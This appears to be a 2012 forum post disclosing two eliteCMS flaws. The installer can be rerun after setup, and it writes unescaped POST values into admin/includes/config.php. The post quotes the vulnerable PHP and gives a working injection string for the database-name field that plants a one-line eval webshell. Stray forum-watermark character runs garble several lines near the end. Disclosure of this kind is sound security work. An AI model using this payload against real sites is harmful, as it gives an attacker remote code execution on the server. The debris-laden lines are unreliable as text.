eliteCMS installer not locked + one-line webshell (一句话) write vulnerability

Posted on 2012-11-18 13:59:27
eliteCMS's installer is not locked after installation finishes, so an attacker can browse to the installer URL and run the installation again.

The other vulnerability is that the installer can write a one-line webshell straight into admin/includes/config.php.
Let's look at the code (install step 4, which generates the config file; the debris from the forum watermark has been stripped):

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated into PHP string literals with no escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // the generated source is written to config.php as-is
    $writer = fopen($file, 'w');
...
# _# d3 H; j3 P) C! i& ]
Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

5 H# t2 F& _6 J5 w) e" e8 Z取值未作任何验证
7 F9 Z, E7 R( H2 m# ^* R如果将数据库名POST数据:1 X/ S4 Y/ r1 Y& A% A0 l
" H, i" e9 O$ u6 @+ {$ G0 J
"?><?php eval($_POST[c]);?><?php# l4 P  |. x# ]: ?: T5 H

7 P* b3 f* x$ j) }将导致一句话后门写入/admin/includes/config.php